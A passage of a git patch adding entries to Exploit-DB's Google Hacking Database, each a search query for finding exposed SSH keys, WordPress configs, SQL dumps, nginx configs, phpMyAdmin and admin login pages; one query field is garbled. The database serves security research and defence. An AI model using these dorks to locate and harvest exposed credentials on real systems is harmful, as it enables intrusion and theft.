+# Date: 11/09/2023
+# Exploit Ritesh Sahu</textualDescription>
+  <query>intitle:&quot;index of /wp-content/plugins&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of /wp-content/plugins&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Ritesh Sahu</author>
+ </entry>
  <entry>
   <id>7997</id>
   <link>https://www.exploit-db.com/ghdb/7997</link>
@@ -41823,6 +41898,21 @@ https://ch.linkedin.com/in/schmidbruno
   <date>2021-10-29</date>
   <author>Chinmay Divekar</author>
  </entry>
+ <entry>
+  <id>8230</id>
+  <link>https://www.exploit-db.com/ghdb/8230</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</shortDescription>
+  <textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Ritesh Sahu</textualDescription>
+  <query>intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Ritesh Sahu</author>
+ </entry>
  <entry>
   <id>7621</id>
   <link>https://www.exploit-db.com/ghdb/7621</link>
@@ -44544,6 +44634,21 @@ misconfigured servers.
   <date>2021-10-05</date>
   <author>Suman Das</author>
  </entry>
+ <entry>
+  <id>8235</id>
+  <link>https://www.exploit-db.com/ghdb/8235</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; &quot;nginx.conf&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;nginx.conf&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Momin Monis</textualDescription>
+  <query>google dork give nginx.conf file</query>
+  <querystring>https://www.google.com/search?q=google dork give nginx.conf file</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Momin Monis</author>
+ </entry>
  <entry>
   <id>7716</id>
   <link>https://www.exploit-db.com/ghdb/7716</link>
@@ -49968,6 +50073,23 @@ https://ch.linkedin.com/in/schmidbruno
   <date>2004-05-24</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8228</id>
+  <link>https://www.exploit-db.com/ghdb/8228</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</shortDescription>
+  <textualDescription>Google Dork: inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Author: Datain Alexandre
+
+</textualDescription>
+  <query>inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Datain Alexandre</author>
+ </entry>
  <entry>
   <id>3632</id>
   <link>https://www.exploit-db.com/ghdb/3632</link>
@@ -51199,6 +51321,21 @@ Happy Hunting
   <date>2021-11-08</date>
   <author>Jaydev Ahire</author>
  </entry>
+ <entry>
+  <id>8237</id>
+  <link>https://www.exploit-db.com/ghdb/8237</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:/phpMyAdmin/index.php?server=1</shortDescription>
+  <textualDescription># Google Dork: inurl:/phpMyAdmin/index.php?server=1
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Aashiq Ahamed</textualDescription>
+  <query>inurl:/phpMyAdmin/index.php?server=1</query>
+  <querystring>https://www.google.com/search?q=inurl:/phpMyAdmin/index.php?server=1</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Aashiq Ahamed</author>
+ </entry>
  <entry>
   <id>7421</id>
   <link>https://www.exploit-db.com/ghdb/7421</link>
@@ -53236,6 +53373,21 @@ Mufeed VH
   <date>2004-05-17</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8226</id>
+  <link>https://www.exploit-db.com/ghdb/8226</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:php?id=1 site:com</shortDescription>
+  <textualDescription>Google Dork: inurl:php?id=1 site:com
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Akshad Joshi</textualDescription>
+  <query>inurl:php?id=1 site:com</query>
+  <querystring>https://www.google.com/search?q=inurl:php?id=1 site:com</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Akshad Joshi</author>
+ </entry>
  <entry>
   <id>3641</id>
   <link>https://www.exploit-db.com/ghdb/3641</link>
@@ -53709,6 +53861,21 @@ Name: Suyog Pawar.
   <date>2015-07-27</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8236</id>
+  <link>https://www.exploit-db.com/ghdb/8236</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:wp-config.txt intext:mysql</shortDescription>
+  <textualDescription># Google Dork: inurl:wp-config.txt intext:mysql
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit s Thakur</textualDescription>
+  <query>inurl:wp-config.txt intext:mysql</query>
+  <querystring>https://www.google.com/search?q=inurl:wp-config.txt intext:mysql</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>s Thakur</author>
+ </entry>
  <entry>
   <id>4325</id>
   <link>https://www.exploit-db.com/ghdb/4325</link>
@@ -53870,6 +54037,22 @@ passwords..etc</textualDescription>
   <date>2021-11-08</date>
   <author>Stuart Steenberg</author>
  </entry>
+ <entry>
+  <id>8231</id>
+  <link>https://www.exploit-db.com/ghdb/8231</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:wp-includes</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;wp-includes&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Author: Jose Rivas Aka. Bl4cksku11
+</textualDescription>
+  <query>inurl:wp-includes</query>
+  <querystring>https://www.google.com/search?q=inurl:wp-includes</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Jose Rivas Aka. Bl4cksku11</author>
+ </entry>
  <entry>
   <id>4615</id>
   <link>https://www.exploit-db.com/ghdb/4615</link>
@@ -70472,6 +70655,21 @@ Drupal login portals
   <date>2019-05-13</date>
   <author>Isaiah Puzon</author>
  </entry>
+ <entry>
+  <id>8238</id>
+  <link>https://www.exploit-db.com/ghdb/8238</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>intext:&quot;Login&quot; inurl:/secure</shortDescription>
+  <textualDescription># Google Dork: intext:&quot;Login&quot; inurl:/secure
+# Pages Containing Login Portals
+# Date: 11/09/2023
+# Exploit Shubhranshu Gorai</textualDescription>
+  <query>intext:&quot;Login&quot; inurl:/secure</query>
+  <querystring>https://www.google.com/search?q=intext:&quot;Login&quot; inurl:/secure</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Shubhranshu Gorai</author>
+ </entry>
  <entry>
   <id>829</id>
   <link>https://www.exploit-db.com/ghdb/829</link>
@@ -80554,6 +80752,22 @@ Reza Abasi(Turku)
   <date>2021-08-23</date>
   <author>Marko Žlender</author>
  </entry>
+ <entry>
+  <id>8232</id>
+  <link>https://www.exploit-db.com/ghdb/8232</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;
+# Pages Containing Login Portals
+# Date: 11/09/2023
+# Exploit Author: Jose Rivas Aka. Bl4cksku11
+</textualDescription>
+  <query>inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Jose Rivas Aka. Bl4cksku11</author>
+ </entry>
  <entry>
   <id>5567</id>
   <link>https://www.exploit-db.com/ghdb/5567</link>
@@ -87701,6 +87915,23 @@ accident responsibilities are assigned to this anonymous user.
   <date>2020-04-23</date>
   <author>Dan Petran</author>
  </entry>
+ <entry>
+  <id>8227</id>
+  <link>https://www.exploit-db.com/ghdb/8227</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>inurl:tech &quot;login&quot;</shortDescription>
+  <textualDescription>Google Dork: inurl:tech &quot;login&quot;
+# Pages Containing Login Portals
+# Date: 11/09/2023
+# Exploit Ivan Nizer Gonsalves 
+
+</textualDescription>
+  <query>inurl:tech &quot;login&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:tech &quot;login&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Ivan Nizer Gonsalves</author>
+ </entry>
  <entry>
   <id>6841</id>
   <link>https://www.exploit-db.com/ghdb/6841</link>

From 3cde8c39d65312918eea3a67d23955e0d7476e12 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 13 Sep 2023 00:16:29 +0000
Subject: [PATCH 17/17] DB: 2023-09-13

1 changes to exploits/shellcodes/ghdb
---
 ghdb.xml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/ghdb.xml b/ghdb.xml
index dc3eb6dc69..f5481fce6f 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -41898,6 +41898,21 @@ https://ch.linkedin.com/in/schmidbruno
   <date>2021-10-29</date>
   <author>Chinmay Divekar</author>
  </entry>
+ <entry>
+  <id>8239</id>
+  <link>https://www.exploit-db.com/ghdb/8239</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; &quot;.sql&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.sql&quot;
+# Files Containing Juicy Info
+# Date: 12/09/2023
+# Exploit Aashiq Ahamed</textualDescription>
+  <query>intitle:&quot;index of&quot; &quot;.sql&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.sql&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-12</date>
+  <author>Aashiq Ahamed</author>
+ </entry>
  <entry>
   <id>8230</id>
   <link>https://www.exploit-db.com/ghdb/8230</link>
@@ -54819,6 +54834,21 @@ s3 site:amazonaws.com filetype:xls login
   <date>2021-11-10</date>
   <author>Sonali Bhutad</author>
  </entry>
+ <entry>
+  <id>8240</id>
+  <link>https://www.exploit-db.com/ghdb/8240</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>site: zoom+meeting+passcode</shortDescription>
+  <textualDescription># Google Dork: site: zoom+meeting+passcode
+# Files Containing Juicy Info
+# Date: 12/09/2023
+# Exploit tarun mahato</textualDescription>
+  <query>site: zoom+meeting+passcode</query>
+  <querystring>https://www.google.com/search?q=site: zoom+meeting+passcode</querystring>
+  <edb></edb>
+  <date>2023-09-12</date>
+  <author>tarun mahato</author>
+ </entry>
  <entry>
   <id>7949</id>
   <link>https://www.exploit-db.com/ghdb/7949</link>